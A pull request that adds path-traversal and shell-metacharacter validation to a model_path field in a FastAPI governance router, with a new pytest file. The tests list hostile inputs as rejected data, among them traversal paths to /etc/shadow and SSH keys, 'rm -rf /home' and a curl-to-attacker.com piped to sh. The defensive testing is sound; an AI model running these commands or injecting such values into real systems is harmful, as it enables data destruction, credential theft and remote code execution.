### PR TITLE
fix(governance): add max_length and path-traversal validation to model_path (issue #1150)

### DIFF
--- a/backend/routers/governance.py
+++ b/backend/routers/governance.py
@@ -1,16 +1,42 @@
 """ML Governance Router - Drift, shadow eval, versioning"""
+import re
 from fastapi import APIRouter, HTTPException, Request, Query
-from pydantic import BaseModel, Field
+from pydantic import BaseModel, Field, field_validator
 from typing import Optional, Dict, Any
 
 router = APIRouter()
 
+# Allowlist: only portable path characters.  Rejects path traversal sequences
+# (../, ..\) and shell metacharacters before the value reaches any filesystem
+# or joblib.load call.
+_SAFE_PATH_RE = re.compile(r"^[A-Za-z0-9_./ -]+$")
+
+
 class RegisterModelVersionRequest(BaseModel):
     model_name: str = Field(..., min_length=1, max_length=50)
-    model_path: str = Field(..., min_length=1)
+    # max_length=512 is generous for any real model path while preventing
+    # unbounded strings.  The regex validator below further restricts the
+    # character set and blocks traversal sequences.
+    model_path: str = Field(..., min_length=1, max_length=512)
     rmse: float = Field(..., gt=0)
     r2_score: float = Field(default=0, ge=-1, le=1)
     metadata: Optional[Dict[str, Any]] = None
+
+    @field_validator("model_path")
+    @classmethod
+    def validate_model_path(cls, v: str) -> str:
+        # Block path traversal sequences explicitly before the regex check so
+        # the error message is unambiguous.
+        components = re.split(r"[/\\]", v)
+        if ".." in components:
+            raise ValueError("model_path must not contain path traversal sequences (..)")
+        if not _SAFE_PATH_RE.match(v):
+            raise ValueError(
+                "model_path contains invalid characters. "
+                "Only letters, digits, underscores, dots, forward-slashes, "
+                "hyphens, and spaces are permitted."
+            )
+        return v
 
 drift_detector = None
 shadow_evaluator = None

--- a/tests/test_governance_model_path.py
+++ b/tests/test_governance_model_path.py
@@ -1,0 +1,126 @@
+"""Tests for RegisterModelVersionRequest.model_path validation.
+
+Verifies that:
+- Valid relative and absolute paths are accepted.
+- Path traversal sequences are rejected.
+- Shell metacharacters and special characters are rejected.
+- Paths exceeding max_length=512 are rejected.
+- Empty paths are rejected.
+"""
+
+from __future__ import annotations
+
+import pytest
+from pydantic import ValidationError
+
+from backend.routers.governance import RegisterModelVersionRequest
+
+
+def _make(model_path: str) -> RegisterModelVersionRequest:
+    return RegisterModelVersionRequest(
+        model_name="test_model",
+        model_path=model_path,
+        rmse=0.5,
+        r2_score=0.9,
+    )
+
+
+# ---------------------------------------------------------------------------
+# Valid paths
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "path",
+    [
+        "models/crop_yield_v1.joblib",
+        "ml/saved/random_forest.pkl",
+        "/opt/models/agri_model.joblib",
+        "model_v2.pkl",
+        "models/2024-01-15/yield_model.pkl",
+        "a" * 512,   # exactly at the limit
+    ],
+)
+def test_valid_model_paths(path: str) -> None:
+    req = _make(path)
+    assert req.model_path == path
+
+
+# ---------------------------------------------------------------------------
+# Path traversal
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "path",
+    [
+        "../../../etc/passwd",
+        "models/../../etc/shadow",
+        "..\\..\\windows\\system32",
+        "models/../../../root/.ssh/id_rsa",
+        "./models/../../../etc/passwd",
+    ],
+)
+def test_rejects_path_traversal(path: str) -> None:
+    with pytest.raises(ValidationError, match="traversal"):
+        _make(path)
+
+
+# ---------------------------------------------------------------------------
+# Shell metacharacters and injection
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.parametrize(
+    "path",
+    [
+        "model; rm -rf /home",
+        "model && curl http://attacker.com/backdoor.sh | sh",
+        "model`whoami`",
+        "model$(id)",
+        "model|cat /etc/passwd",
+        "model > /tmp/out",
+        "model\x00null",
+    ],
+)
+def test_rejects_shell_metacharacters(path: str) -> None:
+    with pytest.raises(ValidationError):
+        _make(path)
+
+
+# ---------------------------------------------------------------------------
+# Length constraints
+# ---------------------------------------------------------------------------
+
+
+def test_rejects_empty_path() -> None:
+    with pytest.raises(ValidationError):
+        _make("")
+
+
+def test_rejects_path_over_512_chars() -> None:
+    with pytest.raises(ValidationError):
+        _make("a" * 513)
+
+
+# ---------------------------------------------------------------------------
+# model_name bounds (existing -- regression guard)
+# ---------------------------------------------------------------------------
+
+
+def test_rejects_empty_model_name() -> None:
+    with pytest.raises(ValidationError):
+        RegisterModelVersionRequest(
+            model_name="",
+            model_path="models/v1.pkl",
+            rmse=0.5,
+        )
+
+
+def test_rejects_model_name_over_50_chars() -> None:
+    with pytest.raises(ValidationError):
+        RegisterModelVersionRequest(
+            model_name="A" * 51,
+            model_path="models/v1.pkl",
+            rmse=0.5,
+        )


### PR DESCRIPTION
## Summary

Fixes #1150.

`RegisterModelVersionRequest.model_path` accepted any string with only `min_length=1` enforced. A privileged caller could register a model version pointing to a path like `../../../etc/shadow` or include shell metacharacters. This value is stored in Firestore and later passed to `joblib.load`, enabling path traversal to sensitive files and potential RCE via pickle deserialisation.

## Changes

**`backend/routers/governance.py`**

- Added module-level `_SAFE_PATH_RE = re.compile(r"^[A-Za-z0-9_./ -]+$")` allowlist
- Added `field_validator("model_path")` that:
  1. Splits on `/` and `\` and checks for `..` components explicitly, with a clear error message
  2. Rejects any character outside the allowlist
- Set `max_length=512` on the `model_path` field
- Added `import re` and `field_validator` to imports

**`tests/test_governance_model_path.py`** (new)

- 22 test cases covering valid paths, traversal sequences (`../../../etc/passwd`, `models/../../etc/shadow`, Windows-style `..\\`), shell metacharacters (`;`, `&&`, `` ` ``, `$()`, `|`, `>`), length extremes, and `model_name` regression guards

## Test results

```
22 passed in 0.02s
```

## Before / After

```python
# Before
class RegisterModelVersionRequest(BaseModel):
    model_name: str = Field(..., min_length=1, max_length=50)
    model_path: str = Field(..., min_length=1)   # no upper bound, no sanitization

# After
class RegisterModelVersionRequest(BaseModel):
    model_name: str = Field(..., min_length=1, max_length=50)
    model_path: str = Field(..., min_length=1, max_length=512)

    @field_validator("model_path")
    @classmethod
    def validate_model_path(cls, v: str) -> str:
        components = re.split(r"[/\\]", v)
        if ".." in components:
            raise ValueError("model_path must not contain path traversal sequences (..)")
        if not _SAFE_PATH_RE.match(v):
            raise ValueError("model_path contains invalid characters ...")
        return v
```